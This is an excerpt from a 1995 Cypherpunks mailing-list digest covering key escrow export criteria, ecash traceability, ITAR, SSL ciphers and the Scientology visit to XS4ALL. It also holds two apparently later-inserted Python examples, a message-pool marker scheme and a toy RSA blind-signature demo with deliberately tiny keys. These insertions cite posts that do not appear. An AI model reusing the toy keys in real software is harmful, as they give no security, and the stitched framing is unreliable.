Session 2  What can Trusted Third Parties and Certification Authorities Learn from the Financial Clearinghouses
  SPEAKERS: Carol Barrett, Federal Reserve Bank of New York; Bill Nelson, National Automated Clearinghouse Associa; Norman R Nelson, New York Clearing House Association
Session 3  Electronically 'Gluing' Computer-based Records
  SPEAKERS: Phillip Hallam-Baker, Massachusetts Institute of Technology; Allan M Shiffman, Terisa Systems, Inc.
Session 4  Global Registries for Secure Electronic Commerce
  SPEAKERS: Jonathan Allen, Barum Computer Consultants; Michel Peereman, Federation Nationale des Chambres; Peter Robinson, US Council for International Business
Session 5  Computer-based Negotiability: What is Needed to Make it Work
  SPEAKERS: Harold S Burman, Esq., Office of the Legal Advisor; James E Byrne, James Mason University Law School; Ake Nilson, Marinade Limited
Session 6  Time/Date Stamping of Digital Information: Necessities & Options
  SPEAKERS: Richard Rothwell, United States Postal Service; Scott Stornetta, Surety Technologies, Inc.
Session 7  Will Healthcare-related Electronic Commerce Require Special Controls and Secure Infrastructures?
  SPEAKERS: Kathleen Frawley, J.D., M.S., R.R.A, AHIMA; Daniel J O'Shea, National Computer Claims Service
Session 8  The Role of Notaries in Securing Computer-Based Commerce: the CyberNotary(sm)
  SPEAKERS: Theodore S Barassi, Esq., US Council for International Business; Mario Miccoli, International Union of Latin Notaries
Session 9  Electronic Cash and Novel Electronic Commerce Payments Systems
  SPEAKERS: Nessa Eileen Feddis, Esq., Government Relations/Retail Banking; Ron Rivest, Massachusetts Institute of Technology; Marvin Sirbu, Carnegie-Mellon University
Session 10  Why does Everyone Want to be a Trusted Third Party/Certification Authority (at Least Initially)?
  SPEAKERS: Sead Muftic, COST Computer Security Technologies; Stratton D Sclavos, VeriSign, Inc.

-----------------------------------------------------------------
TO REGISTER:
-------------
Price: $550.00 (U.S.)

Name:
Title:
First Name for Badge:
Company/Organization:
Address:
City/State/Prov/Zip/Postal code:
Country:
Telephone:
Fax:
E-Mail:

Check One:
==========
[ ] I am Mailing a check in the amount of $______
[ ] I wish to charge this to a credit card (fax or mail only)
    [ ] American Express  [ ] Visa  [ ] MasterCard
Card Number:
Expiration Date:
Name on Card:
Signature (fax or mail):
-----------------------------------------------------------------

HOTEL RESERVATIONS:
A special conference rate of $129 has been arranged for our attendees.
To make arrangements, please call the Hyatt Regency Bethesda at (301) 657-1234

Hyatt Regency Bethesda
One Bethesda Metro Center
Bethesda, MD 20814
-----------------------------------------------------------------

For more information or a complete program brochure and schedule, contact the conference coordinators as shown below:

HOW TO CONTACT US
=================
E-Mail: wec at multicorp.com
Phone: (214) 516-4900
Fax: (214) 424-0562
Mail: Worldwide Electronic Commerce, PO Box 743485, Dallas, TX 75374
===============================================

From shamrock at netcom.com Tue Sep 5 12:41:48 1995
From: shamrock at netcom.com (Lucky Green)
Date: Tue, 5 Sep 95 12:41:48 PDT
Subject: Acceptable NIS&T restrictions

At 17:20 9/4/95, Bill Stewart wrote:
[...]
> For Commercial Key Escrow, or commercial key-backup services, the criteria are "whoever can be trusted to provide the services the customers want". In this case, of course, the service most customers want is to be left alone, or, failing that, to have the government's Master Key system provide minimal risk to the security of the actual transactions - 64 bit keys are not enough security for any high-valued financial transactions, though they may suffice for credit cards. One required characteristic would appear to be either sufficiently deep pockets to collect judgements for violations of trust or a sufficiently high reputation that violations of trust are not expected.

It seems obvious to me that prospective key escrow agents would be exempt from all liability for damages caused by releasing a key, except in cases of gross negligence. Gross negligence being defined as giving a key to a person who explicitly states that they intend to use it for illegal purposes.

-- Lucky Green PGP encrypted mail preferred.
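Douglas Barnes's return-marker scheme for message pools (his "Slightly faster checking for encrypted messages to me" post earlier in this digest), worked through as an added example. This is not code from his post or from any pool implementation. It assumes a 32-byte marker (his "initial N bits") and SHA-256 as the table hash, and it leaves out the public-key encryption of the headered message and of the message bodies, which the scheme takes for granted; the bodies below are plain placeholder bytes and the pool traffic is constructed inline.

```python
import hashlib
import os

MARKER_LEN = 32   # bytes; the "initial N bits" of each pool message (assumed size)


def new_markers(count):
    """Fresh random return markers, one batch per correspondent."""
    return [os.urandom(MARKER_LEN) for _ in range(count)]


class Correspondent:
    """One party's state: markers it has handed out (for scanning the pool)
    and markers it has been given (for prefixing its own messages)."""

    def __init__(self, name):
        self.name = name
        self._pending = {}     # sha256(marker) -> peer name; struck on first use
        self._usable = {}      # peer name -> markers that peer gave us, unused so far

    def issue_markers(self, peer, count=8):
        # Step 1: generate markers for `peer` and seed our lookup table with them.
        # In Barnes's scheme these travel inside a public-key-encrypted "headered"
        # message; that encryption is assumed here and not shown.
        markers = new_markers(count)
        for m in markers:
            self._pending[hashlib.sha256(m).digest()] = peer
        return markers

    def accept_markers(self, peer, markers):
        self._usable.setdefault(peer, []).extend(markers)

    def send(self, peer, body):
        # Step 2: prefix one never-used marker the peer gave us. pop() guarantees
        # it is never reused; an exhausted list raises IndexError (ask for more).
        marker = self._usable[peer].pop()
        return marker + body

    def scan(self, pool):
        # Step 3: one hash and one dict lookup per pool message, instead of a
        # trial public-key decryption of every headerless message.
        hits = []
        for msg in pool:
            key = hashlib.sha256(msg[:MARKER_LEN]).digest()
            peer = self._pending.pop(key, None)   # consume: markers are single-use
            if peer is not None:
                hits.append((peer, msg[MARKER_LEN:]))
        return hits


def run_exchange():
    """Constructed two-party exchange over a shared pool with unrelated traffic."""
    alice, bob = Correspondent("alice"), Correspondent("bob")
    bob.accept_markers("alice", alice.issue_markers("bob"))    # A -> B, headered
    alice.accept_markers("bob", bob.issue_markers("alice"))    # B's markers for A
    pool = [
        os.urandom(MARKER_LEN) + b"unrelated headerless traffic",   # constructed noise
        bob.send("alice", b"<ciphertext for alice; encryption assumed>"),
        os.urandom(MARKER_LEN) + b"more unrelated traffic",
        alice.send("bob", b"<ciphertext for bob; encryption assumed>"),
    ]
    alice_hits = alice.scan(pool)
    bob_hits = bob.scan(pool)
    replay = alice.scan(pool)      # same pool again: spent markers find nothing
    return alice_hits, bob_hits, replay
```

Scanning costs one hash and one dictionary lookup per pool message rather than a trial decryption, which is the whole point of the scheme. Two properties are worth noticing: a marker is struck from the table the first time it is seen, so an observer who copies the 32-byte prefix of Bob's message and replays it in front of junk gets nothing from Alice's scanner; and nothing stops that observer from flooding the pool, which is the denial-of-service exposure Barnes himself notes.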
From shamrock at netcom.com Tue Sep 5 12:43:09 1995
From: shamrock at netcom.com (Lucky Green)
Date: Tue, 5 Sep 95 12:43:09 PDT
Subject: Forgery, bills, and the Four Horsemen (Articles and Comment)

At 23:44 9/4/95, Black Unicorn wrote:
[...]
> 3. The corruption of e-cash to further the above.
>
> If the government is disturbed by the laundering of money enough to actually print, or even propose printing, two kinds of currency, how will they respond to untraceable, unaccountable and infinitely liquid e-cash? I think the answer is in past behavior: e-cash will be linked to the four horsemen and subjected to rigorous reporting requirements- systems which are true e-cash will be banned.

This is unnecessary, since there is no "true" ecash. DigiCash's ecash in its current form, the only version David Chaum is willing to license, is fully traceable. Popular Cypherpunk myths notwithstanding. First, the recipient of funds is non-anonymous by design. Second, any payer can trivially make the recipient of an ecash note known by revealing the blinding factor. For purposes of law enforcement, DigiCash's ecash is no more secure than if the (insert horseman here) billed his fees to a credit card.

-- Lucky Green PGP encrypted mail preferred.

From iagoldbe at csclub.uwaterloo.ca Tue Sep 5 12:46:19 1995
From: iagoldbe at csclub.uwaterloo.ca (Ian Goldberg)
Date: Tue, 5 Sep 95 12:46:19 PDT
Subject: Wearing RSA shirt to school
Message-ID: <199509051946.PAA03230@calum.csclub.uwaterloo.ca>

OK, I'm confused. Is it or is it not legal to disclose cryptology to a foreigner? T.C.May (I think it was; sorry if I misremember this) posted a couple of days ago that it _was_ legal (citing that textbooks are not stopped from being published internationally). Perhaps this is just because the publishers of these texts never applied for an export license (maybe)?

I was reading Bernstein vs. US Dept. of State, et al.
(http://pgp.ai.mit.edu/~bal/legal/complaint-950221.html), and found this: G. RESULT OF DEFENDANTS' REJECTION OF PLAINTIFF'S CJ REQUEST 71. Plaintiff's scientific paper, algorithm and computer program are speech protected by the First Amendment to the United States Constitution. Thus, by rejecting Plaintiff's CJ Request, Defendants have determined that these items are "defense articles or defense services" which may not be exported without submitting to the above-described prior restraints. Since Defendants define "export" to include disclosing or transferring cryptology to a foreign person anywhere in the world, including within the United States, Plaintiff is informed and believes and therefore alleges that he is required by law to obtain a license to publish or publicly discuss any of the Items whether within or outside the United States. 72. Plaintiff is presently unable to publish his scientific paper, algorithm or computer program within or outside the United States. The only reason preventing publication is the threat of prosecution for an illegal export if he does so without a license. 73. To this date, Plaintiff has not received a response to his appeal or a license to publish his paper, algorithm, or computer program and as a result, he has not published the Items. So it seems to me (at least according to the Plaintiff (EFF, I guess)), that the ITAR regulations _do_ restrict publication and public discussion of cryptology. - Ian "and why is Canada considered part of the US for this?" From shamrock at netcom.com Tue Sep 5 13:38:05 1995 From: shamrock at netcom.com (Lucky Green) Date: Tue, 5 Sep 95 13:38:05 PDT Subject: Emergency File Wipe Algorithim Message-ID: At 11:44 9/5/95, Andrew Loewenstern wrote: >Of course, you data must be worth quite a pretty penny for an attacker to >attempt to recover data from the oxides on the cells in your RAM. 
Didn't I just read a day ago that Robert Morris (ex-NSA) cautioned that one should never underestimate the time and effort an opponent is willing to put into recovering your data?

May I also point out that the rules of economics do not apply to the federal government, since it insists - quite successfully - on having a monopoly on using lethal force to extract arbitrarily large amounts from hundreds of millions of working Americans?

-- Lucky Green PGP encrypted mail preferred.

From jsw at neon.netscape.com Tue Sep 5 13:45:08 1995
From: jsw at neon.netscape.com (Jeff Weinstein)
Date: Tue, 5 Sep 95 13:45:08 PDT
Subject: Non-US SSL128 site
In-Reply-To: <199509051449.KAA13448@joplin.bwh.harvard.edu>
Message-ID: <42icqu$gst@tera.mcom.com>

In article <9509051506.AA09665 at wombat.sware.com>, jeffb at sware.com (Jeff Barber) writes:
> Adam Shostack writes:
> > | Netscape sells a 128-bit US-only client for $39
> >
> > Does the US only server also do des, 3des and IDEA, or just rc4-128?
>
> Yes. It does:
> RC4 - 128
> RC4 - 40
> RC2 - 128
> RC2 - 40
> IDEA
> DES, "64 bits"
> DES "with EDE 3, 192 bits"

Our software does not implement idea at this time. It is in the SSL spec, as a possible cypher choice. We do implement the rest, including DES and 3DES.

--Jeff
--
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw at netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.

From jim at rand.org Tue Sep 5 13:54:02 1995
From: jim at rand.org (Jim Gillogly)
Date: Tue, 5 Sep 95 13:54:02 PDT
Subject: Another Son of Clipper discussion paper
Message-ID: <199509052053.NAA01226@mycroft.rand.org>

I sent along two discussion papers for tomorrow's NIST session on the revised plans for GAK last week. Here's the third.

Jim Gillogly
Hevensday, 14 Halimath S.R.
1995, 20:49
-----------------------------------------------------------------------------
Key Escrow Issues Meeting, September 6-7, 1995
Discussion Paper #3

Export Criteria Discussion Draft -- 64-bit Software Key Escrow Encryption

As discussed at the SPA/AEA meeting on August 17, 1995, the Administration is willing to allow the export of software encryption provided that the products use algorithms with key space that does not exceed 64 bits and the key(s) required to decrypt messages/files are escrowed with approved escrow agents. On the same date, the September 6-7 key escrow issues meeting at NIST was also announced. The two principal topics at the meeting will be: 1) discussion of issues of exportability of 64-bit software key escrow encryption and 2) desirable characteristics for key escrow agents. In order to help make most productive use of the limited time available at the upcoming meeting and to better focus deliberation, the following criteria are being distributed for discussion purposes. Since it is important that final criteria be clear, straightforward, consistent, and implementable, please review these draft criteria and be prepared to discuss how they may be refined and made more specific.

--- Draft Export Criteria ---
for Software Key Escrow Encryption

Software key escrow encryption products meeting the following criteria will be granted special export licensing treatment similar to that afforded other mass-market software products with encryption.

1. The product will use an unclassified encryption algorithm (e.g., DES, RC4) with a key length not to exceed 64 bits.

2. The product shall be designed to prevent multiple encryption (e.g., triple-DES).

3. The key required to decrypt each message or file shall be accessible through a key escrow mechanism in the product, and such keys will be escrowed during manufacture in accordance with #10. If such keys are not escrowed during manufacture, the product shall be inoperable until the key is escrowed in accordance with #10.

4. The key escrow mechanism shall be designed to include with each encrypted message or file, in a format accessible by authorized entities, the identity of the key escrow agent(s), and information sufficient for the escrow agent(s) to identify the key or key components required to decrypt that message.

5. The product shall be resistant to any alteration that would disable or circumvent the key escrow mechanism, to include being designed so that the key escrow mechanism cannot be disabled by a static patch, (i.e., the replacement of a block of code by a modified block).

6. The product shall not decrypt messages or files encrypted by non-escrowed products, including products whose key escrow mechanisms have been altered or disabled.

7. The key escrow mechanism allows access to a user's encrypted information regardless of whether that user is the sender or the intended recipient of the encrypted information.

8. The key escrow mechanism shall not require repeated involvement by the escrow agents for the recovery of multiple decryption keys during the period of authorized access.

9. In the event any such product is or may be available in the United States, each production copy of the software shall either have a unique key required for decrypting messages or files that is escrowed in accordance with #10, or have the capability for its escrow mechanism to be rekeyed and any new key to be escrowed in accordance with #10.

10. The product shall accept escrow of its key(s) only with escrow agents certified by the U.S. Government or by foreign governments with which the U.S. Government has formal agreements consistent with U.S. law enforcement and national security requirements.

Note: Software products incorporating additional encryption methods other than key escrow encryption methods will be evaluated for export on the basis of each encryption method included, as is already the case with existing products. Accordingly, these criteria apply only to the key escrow encryption method incorporated by a software product, and not to other non-escrowed encryption methods it may incorporate. For instance, non-escrowed encryption using a key length of 40 bits or less will continue to be exportable under existing export regulations.

- - -

Please also review discussion paper #1 (distributed earlier), which raises a number of issues involving exportability criteria and how exportable products could be designed. Discussion paper #2 (also previously distributed) presents questions involving key escrow agents.

Note: These issues will be discussed at the Key Escrow Issues Meeting to be held September 6-7, 1995 (9:00 a.m. - 5:00 p.m.) at the National Institute of Standards and Technology (Gaithersburg, Maryland). The meeting will be open to the public, although seating is limited. Advance registration is requested, please contact Arlene Carlton on 301/975-3240, fax: 301/948-1784 or e-mail: carlton at micf.nist.gov.

9/1/95
-----------------------------------------------------------------------------

From cman at communities.com Tue Sep 5 13:57:43 1995
From: cman at communities.com (Douglas Barnes)
Date: Tue, 5 Sep 95 13:57:43 PDT
Subject: approx of bignum^rational
Message-ID:

Does anyone have a good method for approximating bignums raised to rational exponents in the interval [0,1]?
Thanks,
Douglas Barnes
Electric Communities

From anon-remailer at utopia.hacktic.nl Tue Sep 5 14:06:19 1995
From: anon-remailer at utopia.hacktic.nl (Name Withheld by Request)
Date: Tue, 5 Sep 95 14:06:19 PDT
Subject: SSLRef (SSLtelnet)
In-Reply-To: <199509050417.VAA05211@jobe.shell.portal.com>
Message-ID: <199509051940.VAA26244@utopia.hacktic.nl>

Hal (hfinney at shell.portal.com) wrote:
>I understand that Netscape's browser will also accept certificates
>created by a Netscape-internal "test" CA. I hoped that perhaps some
>junk certificates from that CA might be floating around, ones which
>would be useless for conventional purposes because their secret keys
>are exposed, but which would be perfect for my needs.

Is it possible that since this was only a "test" CA, that Netscape used less than a full-strength key? If it was only 512 bits or so, we could try cracking it.

From announce at xs4all.nl Tue Sep 5 14:10:25 1995
From: announce at xs4all.nl (announce)
Date: Tue, 5 Sep 95 14:10:25 PDT
Subject: Scientology and police visit XS4ALL Amsterdam
Message-ID: <199509052109.AA16923@xs1.xs4all.nl>

From: XS4ALL Internet
Postbus 22864
1100 DJ Amsterdam
tel: +31 20 6222885
fax: +31 20 6222753

PRESS RELEASE
-------------

Police and members of Scientology church enter offices of XS4ALL
================================================================

Amsterdam - Tuesday, September 5, 1995.

Today at about 14:00, XS4ALL was visited by Mr. S. Braan, bailiff. He was acting on behalf of the Religious Technology Centre, better known as the Scientology Church, or Scientology for short. He was assisted by a local police officer and Mr. Hermans from the 'Nauta-Dutilh' legal firm that represents Scientology in The Netherlands. Also present were two computer experts (Mr. Ootjes and Mr. Van Suchtelen), a locksmith (to enter had we not been present) and two American employees of Scientology, Mr. Weightman and Ms. Jenssen. Scientology is filing for seizure of XS4ALL's computer equipment.
Under Dutch law, this means that a bailiff comes in to record your assets. In real life, the computer experts that were present have recorded the types and serial numbers of all the computers in our offices. They did not take any equipment; the continuity of XS4ALL's services is not in jeopardy.

What is this all about?
-----------------------

The Scientology Church claims that the XS4ALL anonymous remailer was used to disseminate documents over the Internet to which the church holds the legal copyright. This has led the church to ask the president of the district court of Amsterdam to grant permission for this seizure as a prelude to legal procedures concerning damages suffered by the church. The remailer in question was disabled more than 2 months ago. During the visit of Scientology to XS4ALL this afternoon, the remailer was not the subject of any conversation. The organisation seemed totally preoccupied with the information about Scientology that one of our users has put on his home page. Part of this information is said to be a file to which Scientology holds the copyright. If we were to delete the file in question on the spot, they were willing to drop the seizure.

Responsibility of Internet Providers
------------------------------------

XS4ALL categorically denies any responsibility for contents of users' homepages. The users decide for themselves what is on their homepage. Since XS4ALL does not edit the homepages and has no mechanism of control over the contents, we strongly feel that the users themselves are responsible for what they say on their homepage. This whole affair demonstrates the need for clarity concerning the legal position of Internet Providers. We are shocked that our offices can be invaded by freshly flown-in U.S. cult members. If we as Internet providers are held responsible for what our users say, that will undoubtedly kill freedom of speech on the net.
Scare-tactics
-------------

XS4ALL is not alone in receiving this kind of attention from Scientology. Scientology, a semi-religious multinational, is at war with a number of people on the Internet. A non-organized group of people on the net has started to openly discuss the activities of the church. Until recently, the church has always managed to suppress critical voices by means of sheer intimidation and by engaging in endless legal battle. One of the people that Scientology has a problem with is 'fonss', an XS4ALL user that publishes the F.A.C.T.-net Kit on his home page (http://www.xs4all.nl/~fonss). This kit (which can be found on numerous homepages all over the Internet) consists of a large number of documents that show the true face of Scientology. One of these documents is a piece to which Scientology supposedly holds the copyright and which has been added to the kit without the church's permission.

Additional information can be found on the Internet:
http://www.cybercom.net/~rnewman/scientology/home.html
http://www.xs4all.nl/~fonss
news:alt.religion.scientology
news:alt.censorship
news:alt.clearing.technology

From unicorn at access.digex.net Tue Sep 5 14:11:36 1995
From: unicorn at access.digex.net (Black Unicorn)
Date: Tue, 5 Sep 95 14:11:36 PDT
Subject: Forgery, bills, and the Four Horsemen (Articles and Comment)
In-Reply-To:
Message-ID:

On Tue, 5 Sep 1995, Lucky Green wrote:

> Date: Tue, 5 Sep 1995 12:45:44 -0800
> From: Lucky Green
> To: Black Unicorn , cypherpunks at toad.com
> Subject: Re: Forgery, bills, and the Four Horsemen (Articles and Comment)
> 
> At 23:44 9/4/95, Black Unicorn wrote:
> [...]
> 
> >3. The corruption of e-cash to further the above.
> 
> >If the government is disturbed by the laundering of money enough
> >to actually print, or even propose printing, two kinds of
> >currency, how will they respond to untraceable, unaccountable and
> >infinitely liquid e-cash?
> >I think the answer is in past behavior:
> >e-cash will be linked to the four horsemen and subjected to
> >rigorous reporting requirements- systems which are true e-cash
> >will be banned.
> 
> This is unnecessary, since there is no "true" ecash. DigiCash's ecash in
> its current form, the only version David Chaum is willing to license, is
> fully traceable. Popular Cypherpunk myths notwithstanding.

Perhaps true, but this assumes that the Chaum method is the only method, which I believe to be incorrect. Perhaps I should use the term "future e-cash models" or "True Digital Cash." Currently there is no "true" e-cash implemented (as far as I know), but this is part of the problem. The product introduced to the public, the original market release, will be (is) traceable; why should the public expect anything different? In addition this is exactly what I was talking about in deterring the use of "real" e-cash. Real e-cash will be seen as an anomaly, a perversion of e-cash to make it sneaky for the four horsemen (or that's how I would play it to the public were I a statist).

> 
> First, the recipient of funds is non-anonymous by design. Second, any payer
> can trivially make the recipient of an ecash note known by revealing the
> blinding factor. For purposes of law enforcement, DigiCash's ecash is no
> more secure than if the (insert horseman here) billed his fees to a credit
> card.
> 

Again, one more reason that "real" e-cash will be banned. The public doesn't need it as an alternative is widely available. This is the curse (or gift) of crippleware- its use as a diversion. See also, Clipper

> -- Lucky Green
> PGP encrypted mail preferred.

---
00B9289C28DC0E55 nemo repente fuit turpissimus - potestas scientiae in usu est
E16D5378B81E1C96 quaere verum ad infinitum, loquitur sub rosa - wichtig!
*New Key Information* - Finger for key revocation and latest key update.
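The exchange above between Lucky Green and Black Unicorn (and the follow-ups from Hal and Bryce later in this digest) turns on one property of Chaum-style blind signatures: the bank cannot link a deposited coin to a withdrawal on its own, but a payer who hands over the blinding factor lets it do exactly that. The following Python is an added example written for this page; it is not DigiCash's ecash code and it is not how DigiCash encoded coins. It uses a constructed toy RSA bank key (assumed primes 10007 and 10009 and public exponent 65537, far too small for real use) and an assumed coin format (the SHA-256 of a serial number reduced mod N). It walks through withdrawal, verification, the bank's inability to single out a withdrawal for a given coin without r, and the linkage that becomes trivial once r is disclosed.

```python
"""Toy RSA blind-signature ("Chaumian ecash") round trip.

Added example for this thread, not DigiCash's code. The bank key is a
constructed toy (assumed primes P and Q); real ecash used far larger keys.
"""
import hashlib
import secrets
from math import gcd
from typing import Optional, Tuple

# Constructed toy bank key. Assumption: P, Q, E chosen for readability only.
P, Q = 10007, 10009
N = P * Q
E = 65537
D = pow(E, -1, (P - 1) * (Q - 1))   # private exponent, known only to the bank


def coin_digest(serial: bytes) -> int:
    """Map a coin's serial number into Z_N; this is the value the bank signs."""
    return int.from_bytes(hashlib.sha256(serial).digest(), "big") % N


def blind(m: int, r: Optional[int] = None) -> Tuple[int, int]:
    """Payer side: hide m under a blinding factor r coprime to N.

    Returns (blinded value handed to the bank, r kept secret by the payer).
    A caller may pass r explicitly to make a run reproducible.
    """
    while r is None or gcd(r, N) != 1:
        r = secrets.randbelow(N - 2) + 2
    return (m * pow(r, E, N)) % N, r


def bank_sign(blinded: int) -> int:
    """Bank side: sign whatever blinded value arrives; m is never seen."""
    return pow(blinded, D, N)


def unblind(blinded_sig: int, r: int) -> int:
    """Payer side: strip r to obtain an ordinary RSA signature on m."""
    return (blinded_sig * pow(r, -1, N)) % N


def verify(m: int, sig: int) -> bool:
    """Anyone (payee, bank) checks the coin against the bank's public key."""
    return pow(sig, E, N) == m


def withdraw(serial: bytes, r: Optional[int] = None):
    """Full withdrawal. Returns (m, sig, bank's withdrawal record, r).

    The record (the blinded value) is all the bank can log at withdrawal time.
    """
    m = coin_digest(serial)
    blinded, r = blind(m, r)
    record = blinded
    sig = unblind(bank_sign(blinded), r)
    return m, sig, record, r


def bank_can_link(record: int, m: int, r: int) -> bool:
    """With the payer's r disclosed, the bank recomputes the blinded value and
    matches it against its withdrawal log. This is the traceability Lucky
    Green describes: the payer can always expose where a coin went."""
    return (m * pow(r, E, N)) % N == record


def consistent_blinding_factor(record: int, m: int) -> int:
    """Without r, every (record, coin) pairing is equally plausible: the bank
    (which knows D) can compute an r' that would have produced `record` from
    `m`, so the withdrawal log gives it no way to single out the true pairing.
    """
    return pow((record * pow(m, -1, N)) % N, D, N)


if __name__ == "__main__":
    m, sig, record, r = withdraw(b"coin-0001")
    print("coin verifies:", verify(m, sig))
    print("bank links coin to withdrawal once r is revealed:",
          bank_can_link(record, m, r))
```

`consistent_blinding_factor` is the unlinkability argument in code: for a deposited coin m and any withdrawal record, the bank can construct a blinding factor that explains that pairing, so the log alone carries no information about which withdrawal produced the coin. `bank_can_link` is the other half of the thread's point: a payer who keeps r can later prove, to the bank or anyone else, exactly which withdrawal a recipient's coin came from.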
From andrew_loewenstern at il.us.swissbank.com Tue Sep 5 14:21:26 1995
From: andrew_loewenstern at il.us.swissbank.com (Andrew Loewenstern)
Date: Tue, 5 Sep 95 14:21:26 PDT
Subject: Emergency File Wipe Algorithim
Message-ID: <9509052120.AA02633@ch1d157nwk>

Lucky Green writes:
> Didn't I just read a day ago that Robert Morris (ex-NSA) cautioned
> that one should never underestimate the time and effort an opponent
> is willing to put into recovering your data?
> 
> May I also point out that the rules of economics do not apply to
> the federal government, since it insists - quite successfully - on
> having a monopoly on using lethal force to extract arbitrarily large
> amounts from hundreds of millions of working Americans?

As always, Rubber Hose Cryptanalysis(*tm, patent pending) is usually the cheapest way to go...if you're a federal government. But not all threats are that serious. For instance, I have no fears that the admins here would grovel over the oxides on RAM cells in order to determine the pass-phrase of my PGP key if they suspected me of doing something naughty (even if they knew this was possible, which is unlikely). You can get really paranoid about security and rightly so if your opponent is a federal government. However, pushing key-material bits around RAM in order to prevent them from being burned into the chips is probably going to do you little good if, for instance, a hardware keystroke monitor is surreptitiously installed in your keyboard (which is likely far cheaper and easier than analysing RAM chips and maybe even disk platters).

BTW, this is not a troll and I know that the possible constitutionality of court-ordered disclosure of passphrases or key-material has been hashed over many times in the past here, but have any cases with this particular attribute gone through court yet?
There were reports even years ago of pedophiles and other agents of the Four Horsemen using PGP to encrypt diaries and such; have any of these cases gone to court yet, and did the prosecution attempt to force the defendant to reveal a passphrase??

andrew
(wonders how many readers will take their keyboards apart to look for radio transmitters)

From m5 at dev.tivoli.com Tue Sep 5 14:37:28 1995
From: m5 at dev.tivoli.com (Mike McNally)
Date: Tue, 5 Sep 95 14:37:28 PDT
Subject: Another Son of Clipper discussion paper
In-Reply-To: <199509052053.NAA01226@mycroft.rand.org>
Message-ID: <9509052136.AA11617@alpha>

This is really interesting to me:

Jim Gillogly forwards:
> Key Escrow Issues Meeting, September 6-7, 1995
> Discussion Paper #3
> 
> Export Criteria Discussion Draft --
> 64-bit Software Key Escrow Encryption
> . . .
> --- Draft Export Criteria ---
> for Software Key Escrow Encryption
> 
> Software key escrow encryption products meeting the following
> criteria will be granted special export licensing...
> 
> 1. The product will use an unclassified encryption algorithm
> (e.g., DES, RC4) with a key length not to exceed 64 bits.

Ok, sounds good... but what I don't understand is further on:

> 5. The product shall be resistant to any alteration that would
> disable or circumvent the key escrow mechanism, to include
> being designed so that the key escrow mechanism cannot be
> disabled by a static patch, (i.e., the replacement of a
> block of code by a modified block).

[ that I can understand ]

> 6. The product shall not decrypt messages or files encrypted by
> non-escrowed products, including products whose key escrow
> mechanisms have been altered or disabled.

This is where I start scratching my head. I mean, how exactly will the software be able to tell that what's being fed into it came from a Good version versus an Evil version of the cryptosystem? Isn't that very issue the reason for Skipjack being (A) secret and (B) kept on a supposedly auto-destruct chip?
If the algorithm is public (and to stretch a point, if the executable makes it onto somebody's hard disk, it's effectively public), I don't really understand how the above can be made a realistic goal. I'd always thought that the idea behind software key escrow was that it'd be stuck into most "name-brand" tools, so that Joe Lazy AOL User wouldn't bother (or wouldn't know how) to circumvent it. (Still seems kinda ridiculous, but maybe that's just me.) Anyway, this document makes it seem like somebody seriously expects this is doable. If it is, then I *really* want to know how (because I'd like to exploit that sort of technology myself...).

> 7. The key escrow mechanism allows access to a user's encrypted
> information regardless of whether that user is the sender or
> the intended recipient of the encrypted information.

Ooh.

> 8. The key escrow mechanism shall not require repeated
> involvement by the escrow agents for the recovery of
> multiple decryption keys during the period of authorized
> access.

Hmm...

> 9. In the event any such product is or may be available in the
> United States, each production copy of the software shall
> either have a unique key required for decrypting messages or
> files that is escrowed in accordance with #10,

Well there go the manufacturing costs up through the roof...

> or have the
> capability for its escrow mechanism to be rekeyed and any
> new key to be escrowed in accordance with #10.

I guess that'd work with the somewhat weak mechanisms used with "unlockable" CD-ROM stuff.

> 10. The product shall accept escrow of its key(s) only with
> escrow agents certified by the U.S. Government or by foreign
> governments with which the U.S. Government has formal
> agreements consistent with U.S. law enforcement and national
> security requirements.

Again, how can it tell? Maybe I'm just being dense.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
| Nobody's going to listen to you if you just | Mike McNally (m5 at tivoli.com) |
| stand there and flap your arms like a fish. | Tivoli Systems, Austin TX      |
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From shamrock at netcom.com Tue Sep 5 14:48:13 1995
From: shamrock at netcom.com (Lucky Green)
Date: Tue, 5 Sep 95 14:48:13 PDT
Subject: Emergency File Wipe Algorithim
Message-ID:

At 16:20 9/5/95, Andrew Loewenstern wrote:
[...]
>andrew
>(wonders how many readers will take their keyboards apart to look for radio
>transmitters)

Been there. Done that. Hmm, come to think of it, it's about time for another check.

-- Lucky Green PGP encrypted mail preferred.

From jim at rand.org Tue Sep 5 15:04:59 1995
From: jim at rand.org (Jim Gillogly)
Date: Tue, 5 Sep 95 15:04:59 PDT
Subject: Son of Clipper (commentary)
Message-ID: <199509052204.PAA01423@mycroft.rand.org>

I didn't want to mix my comments with the recent discussion paper I sent along, so here they are separately. Please refer back to my last msg to see the points I'm bitching about.

It's a depressingly restrictive list of things to require for software escrow encryption. I can only conclude that they're not serious. Clipper itself fails to meet many of them, including (I think) #1, #2, #5, and #6. Rumor has it that Clipper does not meet #9 either -- at Crypto '95 somebody in the Key Escrow session said many government Clipper keys are not escrowed, and somebody in the back spoke up and said he owned such a chip. By the way, Moti Yung (noted crypto guy at IBM Yorktown Heights) presented more breaks in Clipper's protocols like those Matt Blaze found, and pointed out some aspects of Matt's break that he thinks make it more important than previously thought.

Other things that bother me about the list:

#1: If it's escrowed, there should be no need to limit the key length unless somebody's planning to cheat.
#3: This rules out the possibility of escrowing individual session keys to limit the access of LE to sessions they are entitled by law to intercept.

#5: Care to tell us how to create software that can't be patched? This is one that's been played in the marketplace and has lost. The battle between copy protectors and crackers has been decided in favor of the crackers: legitimate users largely refuse to buy packages that are too messy to deal with (e.g. they leave hidden files all over the disk, which may interfere with backups or other programs) or that use special purpose hardware (e.g. dongles that eat up a printer port). This one's a loser, I think.

#6: This is clearly a research issue. Several speakers (even pro-GAK) at Crypto '95 said the policy decisions are being made before the research has been done. The protocols and system specifications are key here, and it's not obvious how this criterion can be met. It's not obviously impossible, but it certainly hasn't been solved in Clipper.

#7: One of the Crypto '95 attacks on the Clipper protocol makes use of this misfeature of Clipper. It allows a broadening of the net of captured keys so that many more unauthorized messages may be read.

#8: See #3 above -- let's wait on the policy decision until we have a policy debate. A mandated compromise is an oxymoron. I (for one) would prefer to see much more limited keys (like session keys) if Congress decides that the right to privacy is not infringed by these technologies.

